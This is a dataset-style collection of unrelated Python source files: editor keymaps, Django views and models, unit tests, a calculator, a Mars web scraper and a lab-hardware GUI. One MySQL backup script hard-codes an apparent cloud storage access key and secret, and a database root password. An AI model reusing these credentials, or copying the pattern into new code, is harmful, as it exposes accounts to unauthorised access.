text stringlengths 38 1.54M |
|---|
# Run command file for percol
##########################################
# Custom keymap: Emacs-style (C-n/C-p, C-f/C-b) plus Vim-inspired (C-j/C-k)
# candidate navigation; C-g cancels the percol session.
percol.import_keymap({
    "C-g" : lambda percol: percol.cancel(),
    "C-j" : lambda percol: percol.command.select_next(),
    "C-k" : lambda percol: percol.command.select_previous(),
    "C-n" : lambda percol: percol.command.select_next(),
    "C-p" : lambda percol: percol.command.select_previous(),
    "C-f" : lambda percol: percol.command.select_next_page(),
    "C-b" : lambda percol: percol.command.select_previous_page(),
})
|
from django.urls import path
import recibos.views as recibos_views
# URL routes for the recibos (receipts) app: list view, detail view, and the
# raw file/bytes view of a single receipt.
urlpatterns = [
    # Receipt list at the app root.
    path('', recibos_views.RecibosList.as_view(), name="recibos"),
    # Detail page for one receipt, keyed by primary key.
    path('<int:pk>', recibos_views.RecibosDetail.as_view(), name="recibo"),
    # Binary/file payload of one receipt.
    path('<int:pk>/file', recibos_views.RecibosByteDetail.as_view(), name="recibo_file"),
]
|
import pytest
from takler.core import Limit, Task, SerializationType
from takler.core.limit import InLimit, InLimitManager
def test_limit_to_dict():
    """Limit.to_dict reflects every increment/decrement of the token count."""
    limit = Limit("upload_limit", 10)
    # Fresh limit: no tokens consumed, no node paths recorded.
    assert limit.to_dict() == {
        "name": "upload_limit",
        "limit": 10,
        "value": 0,
        "node_paths": [],
    }
    limit.increment(1, "/flow1/task1")
    assert limit.to_dict() == {
        "name": "upload_limit",
        "limit": 10,
        "value": 1,
        "node_paths": ["/flow1/task1"],
    }
    limit.increment(1, "/flow1/task2")
    assert limit.to_dict() == {
        "name": "upload_limit",
        "limit": 10,
        "value": 2,
        "node_paths": ["/flow1/task1", "/flow1/task2"],
    }
    # Releasing a token removes the matching node path as well.
    limit.decrement(1, "/flow1/task1")
    assert limit.to_dict() == {
        "name": "upload_limit",
        "limit": 10,
        "value": 1,
        "node_paths": ["/flow1/task2"],
    }
def test_limit_from_dict():
    """Limit.from_dict honours the serialization method.

    Tree serialization ignores runtime state (value/node_paths); the default
    and Status serializations require it and must round-trip exactly.
    """
    d = dict(
        name="upload_limit",
        limit=10
    )
    assert Limit.from_dict(d, method=SerializationType.Tree) == Limit("upload_limit", 10)
    # Without runtime state, status-style deserialization must fail.
    with pytest.raises(KeyError):
        Limit.from_dict(d)
    with pytest.raises(KeyError):
        Limit.from_dict(d, method=SerializationType.Status)
    d = dict(
        name="upload_limit",
        limit=10,
        value=1,
        node_paths=["/flow1/task1"]
    )
    limit = Limit("upload_limit", 10)
    limit.increment(1, "/flow1/task1")
    assert Limit.from_dict(d) == limit
    assert Limit.from_dict(d, method=SerializationType.Status) == limit
    assert Limit.from_dict(d, method=SerializationType.Tree) == Limit("upload_limit", 10)
    d = dict(
        name="upload_limit",
        limit=10,
        value=2,
        node_paths=[
            "/flow1/task1",
            "/flow1/task2",
        ]
    )
    limit.increment(1, "/flow1/task2")
    assert Limit.from_dict(d) == limit
    # BUG FIX: this assertion (and the one in the next case) previously
    # checked only truthiness (`assert Limit.from_dict(...)`) and so could
    # never fail; compare for equality like the first case does.
    assert Limit.from_dict(d, method=SerializationType.Status) == limit
    assert Limit.from_dict(d, method=SerializationType.Tree) == Limit("upload_limit", 10)
    d = dict(
        name="upload_limit",
        limit=10,
        value=1,
        node_paths=[
            "/flow1/task2"
        ]
    )
    limit.decrement(1, "/flow1/task1")
    assert Limit.from_dict(d) == limit
    assert Limit.from_dict(d, method=SerializationType.Status) == limit
    assert Limit.from_dict(d, method=SerializationType.Tree) == Limit("upload_limit", 10)
def test_in_limit_to_dict():
    """An InLimit bound to a Limit serializes its name/tokens/node_path."""
    upload_limit = Limit("upload_limit", 10)
    in_limit = InLimit("upload_limit")
    in_limit.set_limit(upload_limit)
    expected = {
        "limit_name": "upload_limit",
        "tokens": 1,
        "node_path": None,
    }
    assert in_limit.to_dict() == expected
def test_in_limit_from_dict():
    """InLimit.from_dict builds an equal object under every serialization method."""
    d = {
        "limit_name": "upload_limit",
        "tokens": 1,
        "node_path": None,
    }
    expected = InLimit(limit_name="upload_limit", tokens=1, node_path=None)
    # Explicit Tree and Status methods, then the default.
    for method in (SerializationType.Tree, SerializationType.Status):
        assert InLimit.from_dict(d, method=method) == expected
    assert InLimit.from_dict(d) == expected
def test_in_limit_manager_to_dict():
    """InLimitManager.to_dict lists every attached in-limit, in order."""
    limit = Limit("upload_limit", 10)
    in_limit = InLimit("upload_limit")
    in_limit.set_limit(limit)
    limit_2 = Limit("run_limit", 5)
    in_limit_2 = InLimit("run_limit")
    # BUG FIX: was `in_limit_2.set_limit(limit)` (copy-paste), which attached
    # the upload limit to the run in-limit instead of limit_2.
    in_limit_2.set_limit(limit_2)
    node = Task("task1")
    in_limit_manager = InLimitManager(node)
    in_limit_manager.add_in_limit(in_limit)
    assert in_limit_manager.to_dict() == dict(
        in_limit_list=[
            dict(
                limit_name="upload_limit",
                tokens=1,
                node_path=None,
            )
        ]
    )
    in_limit_manager.add_in_limit(in_limit_2)
    assert in_limit_manager.to_dict() == dict(
        in_limit_list=[
            dict(
                limit_name="upload_limit",
                tokens=1,
                node_path=None,
            ),
            dict(
                limit_name="run_limit",
                tokens=1,
                node_path=None,
            )
        ]
    )
def test_in_limit_manager_from_dict():
    """InLimitManager.fill_from_dict reattaches in-limits onto a node and
    the resulting manager compares equal to one built via add_in_limit."""
    d = dict(
        in_limit_list=[
            dict(
                limit_name="upload_limit",
                tokens=1,
                node_path=None,
            )
        ]
    )
    # Build the expected state through the public node API.
    expected_node = Task("task1")
    expected_node.add_in_limit("upload_limit")
    node = Task("task1")
    InLimitManager.fill_from_dict(d, node=node)
    assert node.in_limit_manager == expected_node.in_limit_manager
    # A second in-limit: order in in_limit_list must be preserved.
    expected_node.add_in_limit("run_limit")
    d = dict(
        in_limit_list=[
            dict(
                limit_name="upload_limit",
                tokens=1,
                node_path=None,
            ),
            dict(
                limit_name="run_limit",
                tokens=1,
                node_path=None,
            )
        ]
    )
    node = Task("task1")
    InLimitManager.fill_from_dict(d, node=node)
    assert node.in_limit_manager == expected_node.in_limit_manager
|
import xlrd
# Open two workbooks and take the first worksheet of each (presumably for a
# later cell-by-cell comparison; the rest of the script is not shown here).
# NOTE(review): xlrd 2.x removed .xlsx support -- this requires xlrd < 2.0,
# or a switch to openpyxl; confirm the pinned dependency version.
excelFile1 = 'excel1.xlsx'
excelFile2 = 'excel2.xlsx'
book1 = xlrd.open_workbook(excelFile1)
book2 = xlrd.open_workbook(excelFile2)
first_sheet = book1.sheet_by_index(0)
second_sheet = book2.sheet_by_index(0)
#!/usr/local/bin/python3.5
import os,time,sys,time
import oss2
sys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
from lib import innodb_backup as lib_innodb_backup
def upload(host, user, password, port, my_conf):
    """Run an innodb backup of the given MySQL instance and upload the
    resulting tarball to Aliyun OSS.

    :param host: MySQL host to back up
    :param user: MySQL user name
    :param password: MySQL password
    :param port: MySQL port
    :param my_conf: path to the my.cnf used by the backup tool
    """
    # backup() returns the backup path without the .tar.gz suffix, judging
    # by the upload call below -- TODO confirm against lib/innodb_backup.
    abc = lib_innodb_backup.backup(host, user, password, port, my_conf)
    # SECURITY NOTE(review): hard-coded OSS access key/secret committed to
    # source -- rotate these keys and load them from the environment or a
    # secret store instead.
    auth = oss2.Auth('LTAIQFvh36NyxuxI', 'M6Au2n69pz7mZFVrICKaQaFKxTv2do')
    # service = oss2.Service(auth, 'oss-cn-beijing.aliyuncs.com')
    # print([b.name for b in oss2.BucketIterator(service)])
    # NOTE(review): "%Y%d%m" puts day before month -- looks like a typo for
    # "%Y%m%d"; confirm before changing, existing objects use this naming.
    ticks = time.strftime("%Y%d%m_%H%M")
    bucket = oss2.Bucket(auth, 'oss-cn-beijing.aliyuncs.com', 'tplinuxmysqlbackup')
    # Resumable upload: object name is the timestamp, source is the tarball.
    oss2.resumable_upload(bucket, ticks + '.tar.gz', "%s.tar.gz" % abc)
# Entry point: back up the local MySQL instance using /etc/my.cnf.
# SECURITY NOTE(review): the DB credentials are hard-coded here as well.
upload('127.0.0.1', 'root', 'redhat', 3306, '/etc/my.cnf')
|
def add(x, y):
    """Return the sum of x and y."""
    total = x + y
    return total
def subtract(x, y):
    """Return x minus y."""
    difference = x - y
    return difference
def multiply(x, y):
    """Return the product of x and y."""
    product = x * y
    return product
def divide(x, y):
    """Return x divided by y (true division; raises ZeroDivisionError if y == 0)."""
    quotient = x / y
    return quotient
# Interactive calculator menu: read an operation and two integers, then
# print the result using the helper functions defined above.
print("Select One Please:")
print("1. Addition")
print("2. Subtraction")
print("3. Multiplication")
print("4. divide")
choice = input("Please Select One Now:")
num1 = int(input("Enter The First Number"))
num2 = int(input("Enter Your Second Number"))
if choice == '1':
    print(num1, "+", num2, "=", add(num1, num2))
elif choice == '2':
    # BUG FIX: previously called add() here, printing the sum for "-".
    print(num1, "-", num2, '=', subtract(num1, num2))
elif choice == '3':
    # BUG FIX: previously called add() here, printing the sum for "*".
    print(num1, '*', num2, '=', multiply(num1, num2))
elif choice == '4':
    print(num1, '/', num2, '=', divide(num1, num2))
else:
    print("Invalid Input")
|
from splinter import Browser
from bs4 import BeautifulSoup
from webdriver_manager.chrome import ChromeDriverManager
import requests
import pandas as pd
import time
import os
def init_browser():
    """Create a visible (non-headless) Chrome Browser driven by splinter,
    downloading a matching chromedriver via webdriver_manager."""
    # NOTE: Replace the path with your actual path to the chromedriver
    executable_path = {'executable_path': ChromeDriverManager().install()}
    return Browser('chrome', **executable_path, headless=False)
def scrape():
    """Scrape NASA/JPL Mars pages and return a summary dict.

    Returns a dict with keys: Title, Paragraph (latest news), FeaturedImage
    (JPL image URL), MarsFacts (HTML table), HemisphereImages (list of
    {"title", "img_url"} dicts).
    """
    browser = init_browser()
    # NASA Mars News Scrape
    news_url = "https://mars.nasa.gov/news/?page=0&per_page=40&order=publish_date+desc%2Ccreated_at+desc&search=&category=19%2C165%2C184%2C204&blank_scope=Latest"
    browser.visit(news_url)
    # HTML object
    html = browser.html
    # Parse HTML with Beautiful Soup
    # NOTE(review): this soup is captured BEFORE the filter clicks below, so
    # the parsed results may not reflect the selected filters -- confirm.
    soup = BeautifulSoup(html, 'html.parser')
    # Select latest category
    browser.find_by_id('date').first.click()
    browser.find_option_by_text('Latest').first.click()
    # Select All categories
    browser.find_by_id('categories').first.click()
    browser.find_option_by_text('All Categories').first.click()
    browser.find_by_id('categories').first.click()
    # NOTE(review): sleep(0) does not wait at all -- probably meant a
    # positive delay like the 0.5s used in the hemispheres loop below.
    time.sleep(0)
    # Collect the latest News Title
    results = soup.find('li', class_="slide")
    # Parse the first title from the results
    news_title = results.find('div', class_='content_title').text.strip()
    # Parse out the first paragraph associated with the title from results
    news_p = results.find('div', class_='article_teaser_body').text.strip()
    # -------------------------------------------------------------------------------
    # JPL Mars Space Images - Featured Image
    # Use splinter to browse through page
    images_url = "https://www.jpl.nasa.gov/images?search=&category=Mars"
    browser.visit(images_url)
    # HTML object
    html = browser.html
    # Parse HTML with Beautiful Soup
    soup = BeautifulSoup(html, 'html.parser')
    # Use splinter to click on Mars filter
    browser.find_by_id('filter_Mars').click()
    # Find image url (data-src of the first BaseImage) and save to variable
    featured_image_url = browser.find_by_css('.BaseImage')['data-src']
    # -------------------------------------------------------------------------------
    # MARS Facts
    # Use splinter to browse through page
    facts_url = "https://space-facts.com/mars/"
    browser.visit(facts_url)
    # Use Panda's `read_html` to parse the url
    facts_tables = pd.read_html(facts_url)
    # parse through list of dataframes for Mars Facts
    mars_0_df = facts_tables[0]
    # Rename columns
    column_names = {
        0: "Description",
        1: "Mars Fact"
    }
    mars_1_df = mars_0_df.rename(columns=column_names)
    # Set the index of the columns to Description of facts
    mars_df = mars_1_df.set_index("Description")
    # Convert Mars DF to html table
    mars_facts_html = mars_df.to_html()
    # -------------------------------------------------------------------------------
    # Mars Hemispheres
    # Use splinter to browse through page
    hemispheres_url = "https://astrogeology.usgs.gov/search/results?q=hemisphere+enhanced&k1=target&v1=Mars"
    browser.visit(hemispheres_url)
    # HTML object
    html = browser.html
    # Parse HTML with Beautiful Soup
    soup = BeautifulSoup(html, 'html.parser')
    # Retrieve all elements that contain hemisphere information
    # Find the image link to access the high resolution image
    results = soup.find_all('div', class_='item')
    results
    hemisphere_image_urls = []
    count = 0
    # For each hemisphere: click its heading, grab the "Sample" link's href,
    # then navigate back to the search results for the next iteration.
    for each_result in results:
        title = each_result.find('h3').text
        browser.find_by_tag("h3")[count].click()
        time.sleep(0.5)
        count = count + 1
        html = browser.html
        # soup_2 = BeautifulSoup(html, 'html.parser')
        img_url = browser.find_by_text('Sample')['href']
        hemisphere_dict = {
            "title": title,
            "img_url": img_url
        }
        hemisphere_image_urls.append(hemisphere_dict)
        time.sleep(0.5)
        browser.visit(hemispheres_url)
    browser.quit()
    mars_dict = {
        "Title": news_title,
        "Paragraph": news_p,
        "FeaturedImage": featured_image_url,
        "MarsFacts": mars_facts_html,
        "HemisphereImages": hemisphere_image_urls
    }
    return mars_dict
# this section of the code does not process or analyze anything. This simply exists to call on other modules to collect, store and use
# their outputs. This file requires all the imports just as all the imports mentioned here cannot run without this file. This code exists
# purely for organizational purposes and should not be taken as anything else.
import audio_pcg
import ewt
import sound_recog
import grapher
import numpy as np
import matplotlib.pyplot as plt
# Orchestration only (see header comment): record/export audio, transform,
# segment, classify heart sounds, then plot the colored signal.
audio_pcg.write_to_sheet()
# Empirical wavelet transform: envelope, phase, and the raw signal.
env, phase, signal = ewt.transform()
phase_list = phase.tolist()
# Segment the phase series into candidate PCG segments.
segmented_vector = sound_recog.segment(phase_list)
print('pcg segments')
print(*segmented_vector, sep='\n')
# Derive per-segment parameters: intervals, durations, envelope areas.
intl, dur, area_env = sound_recog.initialize_parameters(segmented_vector, phase_list)
# Classify segments into heart sounds.
heart_sounds = sound_recog.recog(len(segmented_vector), dur, area_env, intl)
print()
print('heart sounds extracted from input signal')
print(*heart_sounds, sep='\n')
# Color each sample by its segment/heart-sound classification and plot.
col = grapher.get_colors(segmented_vector, env, heart_sounds)
x = np.arange(len(signal))
grapher.plot_multicolored_lines(x, signal, col)
plt.show()
# plt.plot(x)
# plt.show()
|
import copy
import logging
from topicnet.cooking_machine.models import (
BaseScore as BaseTopicNetScore,
TopicModel
)
from .base_score import BaseScore
# Root logger (no name) -- module-specific getLogger(__name__) would be
# more conventional.
_logger = logging.getLogger()
# TODO: kostyl ("crutch"): module-level mutable flag, presumably read
# elsewhere to skip dataset loading. Note the `global` statement at module
# scope is a no-op.
global __NO_LOADING_DATASET__
__NO_LOADING_DATASET__ = [False]
class BaseCustomScore(BaseScore):
    """Base class for scores attached to a TopicNet TopicModel as "custom"
    scores.

    Subclasses implement _initialize() to build the underlying TopicNet
    score object; `self._score` is presumably assigned from it before
    _attach() runs -- TODO confirm against BaseScore.
    """
    def __init__(self, name, higher_better: bool = True):
        super().__init__(name, higher_better)

    def _attach(self, model: TopicModel):
        """Register a deep copy of the underlying score on `model` under
        this score's name, warning if the name is already taken."""
        if self._name in model.custom_scores:
            _logger.warning(
                f'Score with such name "{self._name}" already attached to model!'
                f' So rewriting it...'
                f' All model\'s custom scores: {list(model.custom_scores.keys())}'
            )
        # TODO: workaround: maybe a better way is possible
        setattr(self._score, '_higher_better', self._higher_better)
        # TODO: TopicModel should provide ability to add custom scores
        # Deep copy so later mutation of self._score does not affect the model.
        model.custom_scores[self.name] = copy.deepcopy(self._score)

    def _initialize(self) -> BaseTopicNetScore:
        # Subclass responsibility: build and return the TopicNet score.
        raise NotImplementedError()
|
from django.db import models
# Create your models here.
class Adminmodel(models.Model):
    """Admin login credentials.

    SECURITY NOTE(review): the password is stored as plain text
    (CharField, max_length=8) -- prefer Django's auth framework with
    hashed passwords.
    """
    User_Name = models.CharField(max_length=30)
    Password = models.CharField(max_length=8)

    def __str__(self):
        return self.User_Name
class StateModel(models.Model):
    """A state; parent of CityModel via ForeignKey."""
    State_no = models.AutoField(primary_key=True)
    State_Name = models.CharField(max_length=30, unique=True)

    def __str__(self):
        return self.State_Name
class CityModel(models.Model):
    """A city belonging to a state."""
    City_No = models.AutoField(primary_key=True)
    City_Name = models.CharField(max_length=40, unique=True)
    # NOTE(review): this field is a FK to StateModel, not a name string --
    # the DB column becomes State_Name_id; a name like `state` would be
    # clearer (renaming requires a migration).
    State_Name = models.ForeignKey(StateModel, on_delete=models.CASCADE)

    def __str__(self):
        return self.City_Name
class AreaModel(models.Model):
    """An area/neighbourhood belonging to a city."""
    Area_No = models.AutoField(primary_key=True)
    Area_Name = models.CharField(max_length=30, unique=True)
    # NOTE(review): FK named like a string field -- see CityModel.State_Name.
    City_Name = models.ForeignKey(CityModel, on_delete=models.CASCADE)

    def __str__(self):
        return self.Area_Name
class Type_of_resModel(models.Model):
    """Type/category of a place (e.g. of a restaurant)."""
    Type_No = models.AutoField(primary_key=True)
    Type_Of_Place = models.CharField(max_length=40)

    def __str__(self):
        return self.Type_Of_Place
class UserModel(models.Model):
    """An end user, keyed by e-mail address.

    NOTE(review): several modelling issues to revisit (each needs a
    migration to fix):
      - Password as IntegerField stores a plain numeric password; use
        Django's auth framework / hashed passwords.
      - Phone as IntegerField drops leading zeros and limits length; phone
        numbers should be CharField.
      - default=None on non-null fields makes them effectively required at
        the DB level -- confirm that is the intent.
    """
    Email = models.CharField(primary_key=True, max_length=30)
    Password = models.IntegerField()
    Name = models.CharField(max_length=30, default=None)
    Age = models.IntegerField(default=None)
    Phone = models.IntegerField(default=None)
    Gender = models.CharField(max_length=7, default=None)
    Door_No = models.CharField(max_length=7, default=None)
    Street = models.CharField(max_length=30, default=None)
    Area_Or_Village = models.CharField(max_length=30, default=None)
    City = models.CharField(max_length=30, default=None)
class orderFoodModel(models.Model):
    """A food item that can be ordered."""

    # Auto primary key for the food item.
    F_id = models.AutoField(primary_key=True)
    # Display name, unit price, photo (stored under MEDIA_ROOT/orders/),
    # and category of the dish.
    F_name = models.CharField(max_length=30)
    F_price = models.FloatField()
    F_image = models.ImageField(upload_to='orders/')
    F_type = models.CharField(max_length=30)
import pyforms, numpy as np, traceback, math
from pyforms.basewidget import BaseWidget
from pyforms.controls import ControlLabel
from pyforms.controls import ControlText
from pyforms.controls import ControlButton
from pyforms.controls import ControlCombo
from pyforms.controls import ControlCheckBox
from pyforms.controls import ControlFile
from pyforms.controls import ControlList
from pyforms.controls import ControlTextArea
from pyforms.controls import ControlNumber
from pyforms.controls import ControlMatplotlib
from .module_api import WavePlayerModule
class OutputChannelGUI(BaseWidget):
    """Per-channel settings row (event report / loop mode / loop duration)
    embedded in the channels list of WavePlayerModuleGUI.

    Expected kwargs: api (the owning WavePlayerModule), channel_index
    (1-based), and initial values event_report, loop_mode, loop_duration.
    """
    def __init__(self, *args, **kwargs):
        # NOTE(review): the custom kwargs are also forwarded to
        # BaseWidget.__init__ -- confirm pyforms tolerates the extras.
        super().__init__(*args, **kwargs)
        self.api = kwargs.get('api', None)
        self.channel_index = kwargs.get('channel_index', None)
        self.set_margin(10)
        self.setMinimumHeight(60)
        # NOTE(review): default False for the loop-duration *text* control
        # looks odd -- an empty string would be the natural default; confirm.
        self._evt_report = ControlCheckBox('Event report', changed_event=self.__event_report_changed_event, default=kwargs.get('event_report', False))
        self._loop_mode = ControlCheckBox('Loop mode', changed_event=self.__loop_mode_changed_event, default=kwargs.get('loop_mode', False))
        self._loop_duration = ControlText('Loop duration', changed_event=self.__loop_duration_changed_event, default=kwargs.get('loop_duration', False))
        self.formset = [('_evt_report', ' ', '_loop_duration', '_loop_mode')]

    def __event_report_changed_event(self):
        """Write the checkbox state into the module's bpod_events list."""
        value = self._evt_report.value
        channel_index = self.channel_index - 1  # GUI channels are 1-based
        data = self.api.bpod_events
        data[channel_index] = value
        if not self.api.set_bpod_events(data):
            self.alert('Not able to set bpod events: {0}'.format(data))

    def __loop_mode_changed_event(self):
        """Write the checkbox state into the module's loop_mode list."""
        value = self._loop_mode.value
        channel_index = self.channel_index - 1
        data = self.api.loop_mode
        data[channel_index] = value
        try:
            if not self.api.set_loop_mode(data):
                self.alert('Not able to set loop mode: {0}'.format(data))
        except Exception:
            # Surface unexpected driver errors in a dialog instead of crashing.
            self.critical(traceback.format_exc(), 'An error occurred')

    def __loop_duration_changed_event(self):
        """Write the text value into the module's loop_duration list."""
        value = self._loop_duration.value
        channel_index = self.channel_index - 1
        data = self.api.loop_duration
        data[channel_index] = value
        if not self.api.set_loop_duration(data):
            self.alert('Not able to set loop duration: {0}'.format(data))
class WavePlayerModuleGUI(WavePlayerModule, BaseWidget):
    """pyforms GUI wrapper around WavePlayerModule (Bpod analog output).

    Lets the user connect over serial, inspect module parameters, configure
    trigger mode / output range, build a sine waveform from
    amplitude/duration/frequency/sample-rate, load it into a wave slot, and
    play/stop it on a chosen channel.
    """
    TITLE = 'Analog Output Module'

    def __init__(self, parent_win=None):
        BaseWidget.__init__(self, self.TITLE, parent_win=parent_win)
        WavePlayerModule.__init__(self)
        self.set_margin(10)
        # Connection + info controls; most widgets stay disabled until open().
        self._port = ControlText('Serial port', default='/dev/ttyACM0')
        self._connect_btn = ControlButton('Connect', checkable=True, default=self.__connect_btn_evt)
        self._getparams_btn = ControlButton('Get Parameters', default=self.get_parameters, enabled=False)
        self._info = ControlTextArea('Information', enabled=False)
        self._channels = ControlList('Channels', readonly=True, enabled=False)
        self._triggermode = ControlCombo('Channel Select', changed_event=self.__set_trigger_mode_evt, enabled=False)
        self._outputrange = ControlCombo('Output range', changed_event=self.__set_output_range_evt, enabled=False)
        # Combo item values map to the module's numeric codes.
        self._triggermode.add_item('Normal', 0)
        self._triggermode.add_item('Master', 1)
        self._triggermode.add_item('Toggle', 2)
        self._outputrange.add_item('0V to +5V', 0)
        self._outputrange.add_item('0V to +10V', 1)
        self._outputrange.add_item('0V to +12V', 2)
        self._outputrange.add_item('-5V to +5V', 3)
        self._outputrange.add_item('-10V to +10V', 4)
        self._outputrange.add_item('-12V to +12V', 5)
        # Waveform preview; any parameter change triggers a redraw.
        self._wavegraph = ControlMatplotlib('Waveform', on_draw=self.__on_draw_evt)
        self._amplitude = ControlNumber('Amplitude', default=1.0, minimum=0, maximum=1000, changed_event=self._wavegraph.draw, enabled=False)
        self._duration = ControlNumber('Duration', default=3.0, minimum=0, maximum=100, changed_event=self._wavegraph.draw, enabled=False)
        self._frequency = ControlNumber('Frequency', default=1000.0, minimum=1, maximum=10000, changed_event=self._wavegraph.draw, enabled=False)
        self._samplerate = ControlNumber('Sample rate', default=96000, minimum=1, maximum=100000, changed_event=self._wavegraph.draw, enabled=False)
        self._wave_index = ControlNumber('Waveform', enabled=False)
        self._channel_index = ControlNumber('Channel', minimum=1, default=1, enabled=False)
        self._load_waveform_btn = ControlButton('Load waveform', default=self.__load_waveform_btn_evt, enabled=False)
        self._play_waveform_btn = ControlButton('Play', default=self.__play_btn_evt, enabled=False)
        self._stop_waveform_btn = ControlButton('Stop', default=self.__stop_btn_evt, enabled=False)
        self.formset = [
            {
                'a:Connection': [
                    ('_port', '_connect_btn'),
                    ('_triggermode', '_outputrange'),
                    ('_amplitude', '_duration', '_frequency', '_samplerate'),
                    '_wavegraph',
                    ('_wave_index', '_load_waveform_btn', '_channel_index', '_play_waveform_btn', '_stop_waveform_btn')
                ],
                'c: Channels': ['_channels'],
                'd:Information': ['_getparams_btn', '_info']
            }
        ]

    ##########################################################################
    ## EVENTS ################################################################
    ##########################################################################

    def __set_output_range_evt(self):
        """Push the selected output range to the device (skip during form load)."""
        if not self.form_has_loaded: return
        self.set_output_range(self._outputrange.value)

    def __set_trigger_mode_evt(self):
        """Push the selected trigger mode to the device (skip during form load)."""
        if not self.form_has_loaded: return
        self.set_trigger_mode(self._triggermode.value)

    def __set_trigger_profiles_evt(self):
        # NOTE(review): self._triggerprofiles is never created in __init__,
        # so calling this would raise AttributeError -- appears to be dead
        # code left from a removed control; confirm and delete if so.
        self.set_trigger_profiles(self._triggerprofiles.value)

    def __play_btn_evt(self):
        """Play the selected wave slot on the selected channel."""
        self.play(int(self._channel_index.value), int(self._wave_index.value))

    def __stop_btn_evt(self):
        """Stop playback."""
        self.stop()

    def __on_draw_evt(self, figure):
        """Render the sine preview from the current amplitude/duration/
        frequency/sample-rate controls onto the matplotlib figure."""
        try:
            axes = figure.add_subplot(111)
            axes.clear()
            samples = np.arange(0.0, self._duration.value, 1.0/self._samplerate.value)
            wave = self._amplitude.value * np.sin(2.0*math.pi*self._frequency.value*samples)
            axes.plot(wave)
            # Zoom the x axis to roughly the first few periods: x is the
            # sample offset of the first peak (asin(1) = quarter period).
            y = self._amplitude.value
            x = math.asin(y/self._amplitude.value)/(2.0*math.pi*self._frequency.value)
            axes.set_xlim(0, x/(1/self._samplerate.value)*8)
            axes.set_ylim(np.min(wave), np.max(wave))
            self._wavegraph.repaint()
        except:
            # Broad catch is deliberate: drawing errors are shown in a dialog
            # rather than crashing the GUI event loop.
            self.critical(traceback.format_exc(), 'An error occurred')

    def __connect_btn_evt(self):
        """Toggle-button handler: open the serial port or disconnect."""
        if self._connect_btn.checked:
            self.open(self._port.value)
        else:
            self.disconnect()

    def __load_waveform_btn_evt(self):
        """Generate the sine from the current controls and upload it to the
        selected wave slot."""
        samples = np.arange(0.0, self._duration.value, 1.0/self._samplerate.value)
        wave = self._amplitude.value * np.sin(2.0*math.pi*self._frequency.value*samples)
        # NOTE(review): set_sampling_period is given the sample *rate* --
        # confirm the module API's expected unit (rate vs period).
        self.set_sampling_period(self._samplerate.value)
        res = self.load_waveform(int(self._wave_index.value), wave)
        if not res:
            self.alert('Failed to load the waveform')

    ##########################################################################
    ## OVERRIDE FUNCTIONS ####################################################
    ##########################################################################

    def open(self, port):
        """Open the serial connection; on success enable the controls and
        populate one OutputChannelGUI row per device channel."""
        res = super().open(port)
        if res:
            self._connect_btn.label = 'Disconnect'
            self._channels.enabled = True
            self._getparams_btn.enabled = True
            self._info.enabled = True
            self._channels.enabled = True
            self._outputrange.enabled = True
            self._triggermode.enabled = True
            self._wavegraph.enabled = True
            self._amplitude.enabled = True
            self._duration.enabled = True
            self._frequency.enabled = True
            self._samplerate.enabled = True
            self._wave_index.enabled = True
            self._channel_index.enabled = True
            self._load_waveform_btn.enabled = True
            self._play_waveform_btn.enabled = True
            self._stop_waveform_btn.enabled = True
            for i in range(self.n_channels):
                # One settings row per channel, seeded with current state.
                self._channels += ('({0})'.format(i+1),
                    OutputChannelGUI(
                        api=self,
                        channel_index=i+1,
                        event_report=bool(self.bpod_events[i]),
                        loop_mode=bool(self.loop_mode[i]),
                        loop_duration=str(self.loop_duration[i]),
                    )
                )
            self._wavegraph.draw()
        else:
            # Connection failed: pop the toggle button back out.
            self._connect_btn.checked = False

    def disconnect(self):
        """Close the connection and return the GUI to its disabled state."""
        super().disconnect()
        self._connect_btn.label = 'Connect'
        self._channels.clear()
        self._info.value = ''
        self._channels.enabled = False
        self._getparams_btn.enabled = False
        self._info.enabled = False
        self._channels.enabled = False
        self._outputrange.enabled = False
        self._triggermode.enabled = False
        self._wavegraph.enabled = False
        self._amplitude.enabled = False
        self._duration.enabled = False
        self._frequency.enabled = False
        self._samplerate.enabled = False
        self._wave_index.enabled = False
        self._channel_index.enabled = False
        self._load_waveform_btn.enabled = False
        self._play_waveform_btn.enabled = False
        self._stop_waveform_btn.enabled = False

    def get_parameters(self):
        """Query the device, dump the parameters into the info box, and sync
        every control (including the per-channel rows) with device state."""
        super().get_parameters()
        self._wave_index.max = self.max_waves - 1
        self._channel_index.max = self.n_channels
        text = ''
        text += 'Number of channels: {0}\n'.format(self.n_channels)
        text += 'Max waves: {0}\n'.format(self.max_waves)
        text += 'Trigger mode: {0}\n'.format(self.trigger_mode)
        text += 'Trigger profile enabled: {0}\n'.format(self.trigger_profile_enable)
        text += 'Number of trigger profiles: {0}\n'.format(self.n_trigger_profiles)
        text += 'Output range: {0}\n'.format(self.output_range)
        text += 'Bpod events: {0}\n'.format(self.bpod_events)
        text += 'Loop mode {0}\n'.format(self.loop_mode)
        text += 'Sampling rates: {0}\n'.format(self.sampling_rate)
        text += 'Loop durations: {0}\n'.format(self.loop_duration)
        self._info.value = text
        self._outputrange.value = self.output_range
        self._triggermode.value = self.trigger_mode
        # Refresh each embedded OutputChannelGUI row.
        windows = self._channels.value
        for i in range(len(windows)):
            windows[i][1]._evt_report.value = self.bpod_events[i]
            windows[i][1]._loop_mode.value = self.loop_mode[i]
            windows[i][1]._loop_duration.value = str(self.loop_duration[i])

    def _stop(self):
        self.stop()

    def before_close_event(self):
        """Ensure the serial connection is closed when the window closes."""
        self.close()
        super().before_close_event()
if __name__ == '__main__':
    # Standalone launch of the analog-output GUI.
    pyforms.start_app(WavePlayerModuleGUI, geometry=(2000, 0, 600, 500))
#!/usr/bin/env python3
"""Test out the sandbox helper class."""
import sys, os, re
import unittest
import logging
import time
from datetime import datetime
from sandbox import TestSandbox
# Fixture data shipped next to this test file.
DATA_DIR = os.path.abspath(os.path.dirname(__file__) + '/asandbox')
# Set VERBOSE=1 in the environment for extra debug printing in the tests.
VERBOSE = os.environ.get('VERBOSE', '0') != '0'
class T(unittest.TestCase):
    """Exercises TestSandbox: directory listing, file/dir/link creation,
    (recursive) touch with timestamps and hour offsets, and robust cleanup.
    """
    def setUp(self):
        # Most of the time the class will be used like this
        self.sb = TestSandbox(DATA_DIR)
        # Users of the TestSandbox need to clean up explicitly (this is useful since we could skip the
        # cleanup to manually examine the temp dir)
        self.addCleanup(self.sb.cleanup)

    ### THE TESTS ###
    def test_basic(self):
        """The sandbox dir has two files and a symlink
        """
        self.assertEqual(self.sb.lsdir('.'), ['alink1', 'foo1', 'foo2'])

